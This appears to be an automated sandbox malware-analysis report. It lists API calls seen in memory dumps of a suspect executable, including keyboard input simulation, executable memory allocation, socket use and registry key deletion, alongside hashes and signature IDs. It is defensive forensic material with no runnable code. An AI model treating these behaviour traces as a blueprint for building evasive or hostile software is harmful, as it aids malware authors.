                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID: 3cA$_A
                                                                                                                                                  • API String ID: 4104443479-3480954128
                                                                                                                                                  • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                                                                                  • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                                                                                                                                                  • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                                                                                                                                                  • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                                  • String ID: SysMonthCal32
                                                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                                                  • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                                                                                  • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                                                                                                                                                  • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                                                                                                                                                  • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                                  • String ID: Listbox
                                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                                  • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                                                                                  • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                                                                                                                                                  • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                                                                                                                                                  • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __calloc_crt
                                                                                                                                                  • String ID: K$@BL
                                                                                                                                                  • API String ID: 3494438863-2209178351
                                                                                                                                                  • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                                                                                  • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                                                                                                                  • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                                                                                  • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-3689287502
                                                                                                                                                  • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                                                                                  • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                                                                                                                  • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                                                                                  • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-1355242751
                                                                                                                                                  • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                                                                                  • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                                                                                                                  • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                                                                                  • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
APIs
• CharLowerBuffW.USER32(?,?), ref: 0047E0BE
• CharLowerBuffW.USER32(?,?), ref: 0047E101
  • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
• _memmove.LIBCMT ref: 0047E314
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
APIs
• CoInitialize.OLE32(00000000), ref: 004780C3
• CoUninitialize.OLE32 ref: 004780CE
  • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
• VariantInit.OLEAUT32(?), ref: 004780D9
• VariantClear.OLEAUT32(?), ref: 004783AA
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
• WSAGetLastError.WSOCK32(00000000), ref: 004769E1
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
• WSAGetLastError.WSOCK32(00000000), ref: 00476A51
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
                                                                                                                                                  APIs
                                                                                                                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                                                                                                                  • _strlen.LIBCMT ref: 004764D9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4218353326-0
                                                                                                                                                  • Opcode ID: 06a60a28df12286d3fae1664d3672c1810fd433a8f21eb32722a08b1b953fb3e
                                                                                                                                                  • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                                                                                                                                  • Opcode Fuzzy Hash: 06a60a28df12286d3fae1664d3672c1810fd433a8f21eb32722a08b1b953fb3e
                                                                                                                                                  • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                                                                                                                                  APIs
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00AB354C
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AB35D5
                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00AB35E7
                                                                                                                                                  • __freea.LIBCMT ref: 00AB35F0
                                                                                                                                                    • Part of subcall function 00AB32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00AB332C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                  • Opcode ID: 9d228d02c6672074d0d9a30dfaa33ac21c3d7a5038a504c5e35dbfaa02eea117
                                                                                                                                                  • Instruction ID: 55ae8c1730044b7c943ac052e168ea9376a41ff2cd3f92c9c9e3a7c3b891db50
                                                                                                                                                  • Opcode Fuzzy Hash: 9d228d02c6672074d0d9a30dfaa33ac21c3d7a5038a504c5e35dbfaa02eea117
                                                                                                                                                  • Instruction Fuzzy Hash: AC318B72A0021AAFDF259FA4DC45DEE7BA9EF40310F054268E804D6252EB36CE51CB90
                                                                                                                                                  APIs
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                                  • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                                                                                  • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                                                                                                                  • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                                                                                  • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                                                                                                                  APIs
                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                                                                                  • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 0048AC57
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                                  • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                                                                                  • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                                                                                                                  • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                                                                                  • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                                                                                                                  APIs
                                                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                                                                                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                                                                                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                  • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                                                                                  • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                                                                                                                  • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                                                                                  • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                                                                                                                  APIs
                                                                                                                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00460C66
                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00460D33
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                  • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                                                                                  • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                                                                                                                  • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                                                                                  • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                                                                                                                  APIs
                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00436229
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                                                                                                                  Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
• Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
• Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
• Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
APIs
• GetForegroundWindow.USER32 ref: 00484F02
